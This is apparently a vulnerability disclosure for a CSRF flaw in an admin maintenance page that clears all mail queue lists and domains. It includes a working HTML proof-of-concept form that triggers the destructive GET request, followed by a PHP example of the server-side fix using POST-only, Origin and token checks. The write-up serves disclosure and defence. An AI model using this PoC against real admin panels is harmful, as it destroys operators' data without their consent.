CSRF

The page shows the warning "(WARNING: This will completely delete all queue lists and domains, regardless of their status. This should not be run until all legitimate lists and domains in the queue have been successfully processed.)". This action is probably dangerous to handle, and it could be a target for attackers.

URL: http://localhost/dm/admin/maintenance/
Step 1: create a CSRF PoC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/dm/admin/maintenance/clear-queues.php">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Step 2: the victim opens the page and the form sends the request (a GET, since the form sets no method), and the deletion is performed.
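One way to close this hole on the server side, as an added example that is not the application's own code (the real clear-queues.php is not shown on this page; the function names, session key and allowed origin are assumptions):

```php
<?php
// Added example, not the application's own code: a hardened entry point for a
// maintenance action such as clear-queues.php. The session key, the allowed
// origin and the function names are assumptions for illustration.
declare(strict_types=1);
session_start();

const ALLOWED_ORIGIN = 'http://localhost';   // assumption: the admin panel's own origin

// Issue one token per session; the legitimate form embeds it as a hidden field:
//   <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrfToken()) ?>">
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Returns null when the request may proceed, otherwise the reason it was refused.
function csrfReject(string $method, ?string $origin, ?string $postedToken, ?string $sessionToken): ?string
{
    // 1. A state-changing action must not be reachable by GET, so a plain
    //    <form action="..."> (which defaults to GET) or an <img src> cannot fire it.
    if ($method !== 'POST') {
        return 'method';
    }
    // 2. A cross-site form post carries the attacking page's Origin; require our own.
    if ($origin !== ALLOWED_ORIGIN) {
        return 'origin';
    }
    // 3. The token is unknown to a cross-site page; compare in constant time.
    if ($postedToken === null || $sessionToken === null
        || !hash_equals($sessionToken, $postedToken)) {
        return 'token';
    }
    return null;
}

$reason = csrfReject(
    $_SERVER['REQUEST_METHOD'],
    $_SERVER['HTTP_ORIGIN'] ?? null,
    $_POST['csrf_token'] ?? null,
    $_SESSION['csrf_token'] ?? null
);
if ($reason !== null) {
    http_response_code(403);
    error_log("clear-queues refused: $reason");   // leave a trace for the admin log
    exit('Forbidden');
}
// Only past this point would the queue-clearing logic run.
```

The PoC form above fails all three checks (GET, a foreign Origin, no token), while the admin's own form, submitted by POST with the hidden token, passes.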